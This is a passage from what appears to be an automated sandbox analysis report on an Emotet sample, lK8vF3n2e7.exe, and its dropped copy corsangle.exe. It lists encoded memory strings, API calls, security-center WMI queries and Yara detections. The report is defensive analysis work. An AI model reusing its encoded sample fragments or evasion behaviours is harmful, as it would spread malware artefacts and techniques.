GGCYv/nIF88s8u0g2+P0+HU26hK/LWceAVeuSkNiR8z8LgBdFEQL3GovY1H57h9PMe/+GZtdOhpOnSw7JgzKWXEaAFeCFbeCI9nHWijcI+Gy39zjiMmmgV+ia37/CLcqxkz0U75u1H8yecEFJkDXkY9AiQCw0baRHMEYpigHTZZJcJjExSDxKn5tBNshgzAKxw4xNZlo03Fl3WdZbc/RhfGj5VOA+crwluHxKZuUzJvXpQ11zt8VzabHXqRSPh/87HFRAq58dFxrHgPzRfSmncORhe/4kxnWzfTZ9Ip7d6wop2nsc6QdQaB7wQrbrknenqWtfoaN82YpzRD32GW4pk8jSkFnKPDE6r2ml0GtvFaD1nyGTEwEin21iCtTVV7+HG8a6uo3Hgl6/+Cy37hmkDD2wAXv6wAUQ4XTrbzL0PUz9tlj9XHEjNCopkVOKg+r/T7qXdYrydFs1DzTf12IBAqb4lrjOnPgFv6wyulmRou7gMWCoz7IroLTytBeOX7FcZwqRCRvvX5QyEEHCaYvuL7t0AwcsdP4jYT2J895En/HKXrYjhM9t69VNP9hzT9o1s7pQrcEYzgh+3LcChyG0x6fDcvkRbwpuxi9lgNEEMn1Rf54easQcXvdl/1DiaUXjWRgUB5XiXaY+jiguNRxTQjyULVgU0T1OIxTwDDWX0f0sCAOHlLKSW2PKJyhYpYYxaH05bb5kukNXHdjuoQBETYbeS5LPHe0SIFz53ojVvd0HzSG/3m+UrawBSSR+bd/s/ws++ldBpRYXL7CyRgXIZqr3EWJ2e+x+2IAyLWE1Ta1yTkks5GelZdYOZ+h+GUEgcZXsqDObqGjbczoJYxaQGIH+klo0iVnZlcrW0lnCbDIzKwcLGxqg03zCMOaYEc8Z3f6GLDnDixuK3sdHT/POqGOO7wRvajVgy0y8hcLTBv0noAHYEvx5qB7FIj2XoeO1fqFyYm5oOifh3EvuXnvOSxies9ToavkX3FO8mS3xWCgoc4dUq7Q85hC1Nx5c99fRK
            Source: svchost.exe, 00000009.00000002.459529652.0000026126C61000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
            Source: lK8vF3n2e7.exeBinary or memory string: I8oKGytdP622n9WmGxbgmPhIfDzm3srNwnaDwLHaPuaIqKpKHJ+haXU4Lc/uxCygu3VYhfJXxbxfrqdeVt4kZAyaSSnVvXW0zfVXghGFS0LXjfmFDY7skNksCX66umEr8XOIxu8DVf/SLy0Y+CoBz14kYiA8CK3s/p/RPI/LVlsM47LNREhppES52ibX8zLNfqvGlsGDuvFvpXwN8FkJRxlJhksfuNqWAaun7Qgh0yyvLtn88xpWIzGLITTamiabjmuL
            Source: lK8vF3n2e7.exeBinary or memory string: Ssqj+A77eGYtJq8ICEcGHdOAF8zZ/g+lz66vQgUol6twX/hZSXEQhn/P2i+iLwrXI+afbu5s41pTPUk/zpU2fSBxplNRL7EdT8M9SolAnFpa4BtbPcZKxQhxc3BpZiUhXY8wowA3xHMp7vT/hdkN8ybdR5SQ7TZ431qX+GG7n/xLXAcYfozyvRb6gE7S04VNvLKch31pEJrlB1uo7dcrNPIQmxejicPSa7MiCCNtjFQU3W7j3GhgfSrD45h9wj+TNfkZ
            Source: lK8vF3n2e7.exeBinary or memory string: Ssqj+A77eGYtJq8ICEcGHdOAF8zZ/g+lz66vQgUol6twX/hZSXEQhn/P2i+iLwrXI+afbu5s41pTPUk/zpU2fSBxplNRL7EdT8M9SolAnFpa4BtbPcZKxQhxc3BpZiUhXY8wowA3xHMp7vT/hdkN8ybdR5SQ7TZ431qX+GG7n/xLXAcYfozyvRb6gE7S04VNvLKch31pEJrlB1uo7dcrNPIQmxejicPSa7MiCCNtjFQU3W7j3GhgfSrD45h9wj+TNfkZchUUDK8svyeS+Z/voEHonpq3usa7Lwi/i0Pw5x9Z3ZtR1679CMDqgJwF5YSgq7cWmfaWRyFDlh4WAuxDUAoQAyLo6hNF2UAgQcx8JroW9hrqbbJkaP7kCEU965cuQSyCecHV20zrpFbsla589glBVHdIGLVOohoF+V7E9uoLiegRTQ3CQWmHPd+uqEGacP+6jvWF4VGVuMwWuMpBRs+WgjCxhS3fSjktJgRC7oHYBcTsX0vy
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmp, svchost.exe, 00000009.00000002.455342615.0000026121429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 0000000D.00000002.455110546.000001E07A202000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
            Source: lK8vF3n2e7.exe, 00000000.00000003.190971964.000000000235C000.00000004.00000001.sdmpBinary or memory string: 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
            Source: lK8vF3n2e7.exe, 00000000.00000003.190971964.000000000235C000.00000004.00000001.sdmp, lK8vF3n2e7.exe, 00000002.00000003.200863845.000000000237C000.00000004.00000001.sdmp, corsangle.exe, 00000003.00000003.225948136.000000000129C000.00000004.00000001.sdmp, corsangle.exe, 00000004.00000003.237988000.00000000012BC000.00000004.00000001.sdmpBinary or memory string: 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
            Source: svchost.exe, 00000001.00000002.196850072.0000029294540000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.262909344.000001B354940000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.288780129.00000244C3AC0000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.458125183.000001B859D90000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: svchost.exe, 00000001.00000002.196850072.0000029294540000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.262909344.000001B354940000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.288780129.00000244C3AC0000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.458125183.000001B859D90000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: svchost.exe, 0000000D.00000002.455406725.000001E07A23E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.455681474.000001B859242000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.455121527.00000242A942A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: svchost.exe, 00000001.00000002.196850072.0000029294540000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.262909344.000001B354940000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.288780129.00000244C3AC0000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.458125183.000001B859D90000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeAPI call chain: ExitProcess graph end nodegraph_2-32003
            Source: C:\Windows\SysWOW64\corsangle.exeAPI call chain: ExitProcess graph end nodegraph_3-4625
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00401784 LoadLibraryW,GetProcAddress,0_2_00401784
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00401693 mov eax, dword ptr fs:[00000030h]0_2_00401693
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00401693 mov eax, dword ptr fs:[00000030h]2_2_00401693
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021E1743 mov eax, dword ptr fs:[00000030h]2_2_021E1743
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021E0467 mov eax, dword ptr fs:[00000030h]2_2_021E0467
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021E0C0C mov eax, dword ptr fs:[00000030h]2_2_021E0C0C
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_022212CD mov eax, dword ptr fs:[00000030h]2_2_022212CD
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221E04 mov eax, dword ptr fs:[00000030h]2_2_02221E04
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E30467 mov eax, dword ptr fs:[00000030h]3_2_00E30467
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E30C0C mov eax, dword ptr fs:[00000030h]3_2_00E30C0C
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E31743 mov eax, dword ptr fs:[00000030h]3_2_00E31743
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E512CD mov eax, dword ptr fs:[00000030h]3_2_00E512CD
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E51E04 mov eax, dword ptr fs:[00000030h]3_2_00E51E04
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_022214F2 GetProcessHeap,RtlAllocateHeap,2_2_022214F2
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00416EBA SetUnhandledExceptionFilter,0_2_00416EBA
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00416ECE SetUnhandledExceptionFilter,0_2_00416ECE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00416EBA SetUnhandledExceptionFilter,2_2_00416EBA
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00416ECE SetUnhandledExceptionFilter,2_2_00416ECE
            Source: svchost.exe, 0000000F.00000002.455972537.000002466C660000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: svchost.exe, 0000000F.00000002.455972537.000002466C660000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: svchost.exe, 0000000F.00000002.455972537.000002466C660000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: svchost.exe, 0000000F.00000002.455972537.000002466C660000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EE1F7 cpuid 2_2_021EE1F7
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00406115
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,0_2_0042C2AE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: _strlen,EnumSystemLocalesA,0_2_0041C3C6
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: _strlen,_strlen,EnumSystemLocalesA,0_2_0041C3FD
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,0_2_0041C4D8
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: _strlen,EnumSystemLocalesA,0_2_0041C483
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,0_2_0041EDB9
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,MultiByteToWideChar,0_2_0041EE75
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,0_2_0041AED4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,0_2_0041EEE9
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,_strncpy,0_2_0041BEA7
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoW,WideCharToMultiByte,0_2_0041EF9C
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_00406115
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,2_2_0042C2AE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: _strlen,EnumSystemLocalesA,2_2_0041C3C6
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: _strlen,_strlen,EnumSystemLocalesA,2_2_0041C3FD
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,2_2_0041C4D8
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: _strlen,EnumSystemLocalesA,2_2_0041C483
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,2_2_0041EDB9
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,MultiByteToWideChar,2_2_0041EE75
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,2_2_0041AED4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,2_2_0041EEE9
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoA,_strncpy,2_2_0041BEA7
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: GetLocaleInfoW,WideCharToMultiByte,2_2_0041EF9C
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00418520 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00418520
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_0041A554 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,0_2_0041A554
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00409088 GetVersionExA,0_2_00409088
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Changes security center settings (notifications, updates, antivirus, firewall)Show sources
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
            Source: svchost.exe, 00000013.00000002.455118908.000001E666C3D000.00000004.00000001.sdmpBinary or memory string: "@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
            Source: svchost.exe, 00000013.00000002.455313869.000001E666D02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

            Stealing of Sensitive Information:

            barindex
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.456134629.0000000000721000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, type: MEMORY
